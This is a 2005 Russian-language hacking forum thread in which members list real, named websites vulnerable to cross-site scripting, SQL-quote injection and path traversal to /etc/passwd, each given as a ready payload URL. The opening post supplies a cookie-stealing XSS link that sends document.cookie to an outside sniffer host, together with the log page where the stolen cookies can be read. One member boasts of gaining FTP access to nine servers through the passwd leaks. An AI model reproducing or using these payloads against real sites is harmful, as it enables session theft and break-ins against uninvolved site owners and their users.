Бажные сайты от k1b0rg'a

Discussion in 'Уязвимости' started by k1b0rg, 13 Nov 2005.

Thread Status:
Not open for further replies.
  1. SNIFF

    SNIFF junior admin

    Joined:
    15 Nov 2004
    Messages:
    99
    Likes Received:
    10
    Reputations:
    3
    Code:
    [url]http://go.mail.ru/frame.html?imgurl=http://antichat.ru/cgi-bin/s.jpg?+document.cookie&pageurl=http://antichat.ru/cgi-bin/s.jpg?+oO[/url][SNIFF.SUPER.PUPER-BOY.FORUM.ANTICHAT.RU]Oo&iid=aWAoanJ00EEJ&imgwidth=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgheight=%3Cscript%3E
    
    Потом бежим на
    Code:
    [URL=http://antichat.ru/sniff/log.php]http://antichat.ru/sniff/log.php[/URL]
    
    И БАЧИМ ЧТО ПОЛУЧИЛОСЬ!
     
    #61 SNIFF, 27 Nov 2005
    Last edited by a moderator: 28 Nov 2005
  2. SNIFF

    SNIFF junior admin

    Joined:
    15 Nov 2004
    Messages:
    99
    Likes Received:
    10
    Reputations:
    3
    http://64.233.161.104/search?hl=ru&q=http%3A%2F%2F64.233.161.104%2Fsearch%3Fq%3Dcache%3AQxqYk3NwuhsJ%3Asunhi.us%2FphpBB2%2Fviewtopic.php%253Fp%253D6440%2526sid%253D8719e7ad6743826b960ef8d25f30cedc%2B111110A%2Fhttp%26hl%3Den%26start%3D113&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=

    Гooгle Ошибка


    Мы сожалеем...
    ... но мы не можем обработать ваш запрос прямо сейчас. Компьютерный вирус или spywаre приложение пересылка нам автоматизированные запросы, и это появляется, что ваш компьютер или сеть был заражен.

    Мы восстановим ваш доступ как быстро как только возможно, так пробуют снова скоро. Пока суд да дело, вы, возможно, хотели бы бежать вирусный информатор или spywаre перевозчик мебели чтобы убедиться, что ваш компьютер свободен от вирусов и другого поддельного программного обеспечения.

    Мы извиняемся за неудобство, и надеемся, что мы увидимся снова на Google.
     
  3. SNIFF

    SNIFF junior admin

    Joined:
    15 Nov 2004
    Messages:
    99
    Likes Received:
    10
    Reputations:
    3
    Они саме по себе ошибки

    Они саме по себе ошибки

     
    #63 SNIFF, 27 Nov 2005
    Last edited: 27 Nov 2005
  4. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    угу, там просто показываються серверный пути, в принципе они ничего не дают, но мало ли.
    Внимание!
    Эти сайты я опубликую в последний раз, т.к. растет недовольство против меня, я типо флудер, публикую тока из-за репцтации, сайты мои никому нах не нужны и т.д. В связи с этим, я публиковать сайты больше не буду.
    http://search.cstrike.ru/?search='
    http://search.gamestone.ru/?search=<script>alert()</script>
    http://3mp3.ru/ru/search/text/?request='><script>alert()</script>&what=all
    http://www.mestkom.ru/asp/search.asp?action=search не фильтруються поля
    http://holidayclub.inprogress.ru/catalog/index.php?flet="><script>alert()</script>&Co=4&Re=460
    http://hotels.wia.ru/<script>alert()</script>
    http://encycl.accoona.ru/?word=<script>alert()</script>
    http://www.bioone.org/bioone/?request=<script>alert()</script>
    http://www.openhardware.net/?file=<script>alert()</script>
    http://www.avionicsmagazine.com/cgi...e=../../../../../../../../../../../etc/passwd
    http://www.lamuv.de/cgi-bin/store.cgi?action=gamma&file=../../../../../../../../../../../etc/passwd
    http://alumni.calstatela.edu/docume...e=../../../../../../../../../../../etc/passwd
    http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
    http://www.linuxhq.com/perl-bin/search_db?q='style=background:url(javascript:alert());'&qid=4&spp=20
     
    1 person likes this.
  5. 4NT_0_xa

    4NT_0_xa New Member

    Joined:
    24 Nov 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://rusoft.net/index.php?w=1133178547&cat=0&razdel=<script>alert(/xss/)</script>
     
  6. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    не фига себе не нужны, я себе 9 Ftp поднял
     
  7. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    на пассивном хсс???)))))
     
  8. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    нет, на /etc/passwd не все же умные, и ставят пароль и логин разные, есть и иные... их зовут - лолы
     
  9. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    нашол уязвимость
    http://www.kalitva.ru/_/?vs=<script>javascript:alert('')</script>foto/look&id=2710&razdel=7&page=27
    ps незнаю как использовать !!! =))))
     
  10. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Tikson Причём тут Бажные сайты от k1b0rg'a?=))
    Полно инфы есть везде по ипользованию Пассивных XSS.
    Вот статейку почитай.
    _http://dante.net.ru/forum/showthread.php?t=225
    Не забываем про репутацию, если помог ;-) За наводку=)))))))))
     
  11. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    =(

    новодка эта уже была ..... =)))
    ps вот **ня полная почему у всех этот Damage Lab НЕНАВИЖУ его а именное его создателя винукса дружили дружили с ним а потом бац и все ... гад он !!!
    ps ps а еще есть где-нибуть почитать про это???
    ps ps ps а то что я нашол это вообще считается уязвимостью ????
     
    #71 Tikson, 12 Dec 2005
    Last edited: 12 Dec 2005
  12. Kreps

    Kreps Elder - Старейшина

    Joined:
    1 Dec 2005
    Messages:
    47
    Likes Received:
    1
    Reputations:
    0
  13. 1251soldier

    1251soldier Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    38
    Likes Received:
    14
    Reputations:
    -2
  14. vovanAdam

    vovanAdam New Member

    Joined:
    15 Dec 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ну вот например:
    http://ля-ля-тополя<script>alert()</script>
    И что с этим дальше можно делать?
    Свой скрипт вставить мона, или что-то еще?
    (я только начал :))
     
  15. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    vovanAdam Уже обсуждалось. Юзай поиск. А если что-то захотел спросить, то создавай отделюную тему. Твой вопрос к Бажным сайтам от Киборга не имеет ни кокого отношения!
     
  16. 1251soldier

    1251soldier Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    38
    Likes Received:
    14
    Reputations:
    -2
    rap.ru - <script>alert('lol')</script> v stroke poiska ))

    _http://delit.net/search/search_result.phtml?sstr='><script>alert(/lol/)</script>&skind=' potom kliknite na luboj ssylke, vyletaet alert

    _http://search.espn.go.com/keyword/searchESPNShop?searchString=XSS

    _http://app.abc.go.com/keyword/searchResults?search=%3Cscript%3Ealert%28%27lol%27%29%3C%2Fscript%3E&searchType=0
     
    #76 1251soldier, 27 Dec 2005
    Last edited: 2 Jan 2006
Loading...
Thread Status:
Not open for further replies.